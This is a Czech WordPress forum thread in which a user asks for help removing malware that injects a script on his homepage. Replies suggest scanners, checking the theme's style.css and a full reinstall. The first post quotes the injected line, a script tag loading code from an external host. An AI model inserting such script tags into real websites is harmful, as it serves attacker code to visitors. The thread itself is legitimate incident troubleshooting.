vir

Štítky: 

Zvolené téma obsahuje celkem 5 odpovědí. Do diskuze (4 účastníci) se naposledy zapojil uživatel  poooool a poslední změna je stará 12 let.

Aktuálně je na stránce zobrazeno 6 příspěvků - 1. až 6. (z celkem 6)
  • Autor
    Příspěvky
  • #1724

    poooool
    Participant
    Web

    Zdravím,

    pomohli byste mně prosím zbavit se malware nebo viru.

    Objevuje se javascript na úvodní stránce http://www.hodesovice.cz. Funguje i při vypnutých pluginech

    Při přechodu do administrace se javascript nespouští.

    Zkusil jsem upgradovat všechny pluginy a upgradovat na čerstvou verzi Green – nepomohlo.

    Nakonec jsem zjistil, že při použití základní šablony Twenty Eleven je vše v pořádku.

    Jinak jsem používal šablonu Wedding Bells, Autor: Lauri Liimatta

    Homepage má upravený zdrojový kód – je přidaný první řádek:


    <script type=”text/javascript” src=”http://asjo.com.br/js/Check.php”></script>

    <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

    <html xmlns=”http://www.w3.org/1999/xhtml” dir=”ltr” lang=”cs-CZ”>


    #11757

    Bigdrobek
    Participant
    Web

    Ahoj,

    rád bych vyzkoušel jeden plugin, jestli timthumb vulnerability scan něco najde v tvé šabloně.

    1) Zjisti kde je problém

    nahraj si plugin WP Security Scan a aktivuj automatický scan stránek (websitedefender). Počkej chvíli na první scan a hod sem info jestli to něco našlo.

    2)Instaluj timthumb vulnerability scan a spust scan. Ten zjistí jakou máš verzi timthump v šabloně (možná kontroluje i jiné externí files). Dej vědět jestli to něco najde a pomocí tohoto pluginu aktualizuj pokud ti to něco najde.

    Asi by to chtělo reinstalovat šablonu, změnit všechny hesla (ftp, db, wp admin), htaccess a wp-config nastavit práva na 444. I tímto nezjistíme jestli daný soubor malware zmizel. Zkoukni wp-config jestli tam není nějaký divný kod navíc, často úplně dole a úplně vpravo.

    Bigdrobek

    #11758

    poooool
    Participant
    Web

    Ahoj Bigdrobku,

    díky za pomoc.

    ad 1, WP security scan ohlásil následující:

    You have the latest version of WordPress.

    Your table prefix should not be wp_. Click here to change it. Read more on why should change the prefix here.

    Your WordPress version is successfully hidden.

    WordPress DB Errors turned off.

    WP ID META tag removed form WordPress core

    “admin” user exists.

    The file .htaccess does not exist in the wp-admin section. Read more why you should have a .htaccess file in the WP-admin area here.

    zatím jsem nic neměnil, ale udělám, co píše že bych měl

    ad 2) nic nenašel

    No instances of timthumb were found on your server.

    ad 3) změnil jsem heslo ftp, wp adminu

    .htaccess chybí – viz hlášení z WP security scan – mrknu do instalačního balíčku WP

    wp-config nemá podle mě nic špatnýho – ani vpravo nebo dole “za rohem”

    Dnes mně přišlo, že ta moje šablona má novou verzi. Jen se musím podívat, jestli moje úpravy šablony to přežijou.

    Díky

    Pavel.

    #11759

    admin
    Keymaster
    Web

    Je potřeba rozlišit, jak se virus na web dostal a co tam vlastně způsobil.

    1) Vir způsobil načítání zmíněného JavaScriptu, které je závislé na použité šabloně. Proto bude problém v této šabloně. Našel jsem ještě jednu zmínku o tomto viru v německém fóru (objevila se nedávno), kde upozorňují, že by zmíněný řádek měl být vložen na prvním řádku souboru style.css v adresáři používané šablony. Zkuste se tam podívat a odstranit ho.

    2) Jak se to na web vůbec dostalo? Možností je několik:

    a) Může za to uživatel – má zavirovaný počítač a ukládá si nešifrovaná hesla k FTP přímo do programu, který používá. Vir samozřejmě prozkoumá všechny FTP managery na FTP a případně nalezená hesla posílá autorům viru pro další použití. Zkuste pro jistotu prohlédnout počítač nějakým antivirem.

    b) Může za to WordPress – velmi nepravděpodobné (ale také možné).

    c) Může za to hosting – občas se to stává. Většinou by se ale objevilo více stížností, těžko říci. Jaký používáte hosting?

    d) Může za to nějaký plugin, šablona nebo vlastní úprava – velmi časté. Jaké používáte pluginy? Zkuste nám sem dát seznam, třeba tam bude něco podezřelého, zejména Lukenzi v tom má dost přehled :-) I na německém fóru (viz odkaz výše) to řeší, uživatel s napadeným webem tam zveřejnil používané pluginy, třeba tam bude nějaký stejný, který by to mohl způsobovat?

    Nepochopil jsem moc, jakou šablonu vlastně používáte? Píšete o Wedding Bells, kde vyšla nedávno nová verze. Rozhodně doporučujeme aktualizovat, pro příště bych pak prováděl úpravy např. pomocí pluginu či odvozené šablony, aby byly (samozřejmě v rámci možností) nezávislé na budoucích aktualizacích. Pak ale píšete ještě o šabloně Green, takže nevím, kterou vlastně používáte?

    Zkusil jsem upgradovat všechny pluginy a upgradovat na čerstvou verzi Green – nepomohlo.

    Plugin WP Security Scan je sice dobrý na zjištění (a upozornění) “potenciálních” bezpečnostních problémů, ale s virem už nic nezmůže. Stejně tak nezjistí žádný bezpečnostní problém v používaných pluginech a šablonách. Timthumb Vulnerability Scanner zase zkoumá pouze jeden z mnoha veřejně známých bezpečnostních problémů a patrně v tomto případě také moc nepomůže.

    Všechna hesla je sice rozhodně dobré změnit, ale až po odstranění následku (viru) a příčiny (jak se tam dostal). Jinak je to podle mě vcelku zbytečné…

    #11760

    Lukenzi
    Participant

    Naprostý souhlas,

    jen doplním, že opravením napadené šablony se problém nemusí vyřešit (a většinou nevyřeší).

    Pokud bych měl vytvořit vir pro WP nemusím mít extra znalosti na to, aby mi došlo že šablona a pluginy budou první které uživatel zkontroluje. Proto bych samotný vir nakopíroval i do některých systémových souborů a do pluginů které by jste nepodezřívali a které má většina uživatelů stále aktivní (třeba akismet a další)…

    Proto je nejjistější způsob jak se zbavit viru (nebo backdooru) ve WP kompletní smazání celého systému přes FTP a důsledná kontrola všech nově nahraných pluginů a šablon. Samotná aktualizace a přeinstalování systému z administrace vám nepomůže – nepřepíšou se všechny systémové soubory. Nemluvě o tom, že pak nemáte jistotu jestli se vám na FTP stahuje opravdu oficiální neinfikovaný WordPress ;)

    Změna hesel je opravdu až tou poslední záležitostí…

    #11761

    poooool
    Participant
    Web

    Díky adminovi a Lukenzimu za informace.

    Re admin

    ad 1) ve style.css jsem nenašel nic podezřelého kromě standardních stylů

    stránky hostujeme na cesky-hosting.cz

    Seznam pluginů:

    – Another WordPress Classifieds Plugin (AWPCP)

    – BackWPup

    – Countdown Widget

    – Exploit Scanner

    – Google Analytics for WordPress

    – The Events Calendar

    – TimThumb Vulnerability Scanner

    – WP-Polls

    – WP Security Scan

    Šablona, která spolehlivě dá vir na stránky:

    Wedding Bells Autor: Lauri Liimatta

    http://wordpress.org/extend/themes/wedding-bells?TB_iframe=true&width=1024&height=800

    Obávám se, že nejlepší bude opravdu smazat vše přes FTP a nahrát znovu.

    Jelikož jsem WP začátečník, tak z toho mám trošku vítr, protože nevím co všechno je uloženo v souborech a co v databázích. A taky jak napojit čistou souborovou instalaci na existující DB. Zkusím zabrouzdat po netu.

Aktuálně je na stránce zobrazeno 6 příspěvků - 1. až 6. (z celkem 6)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.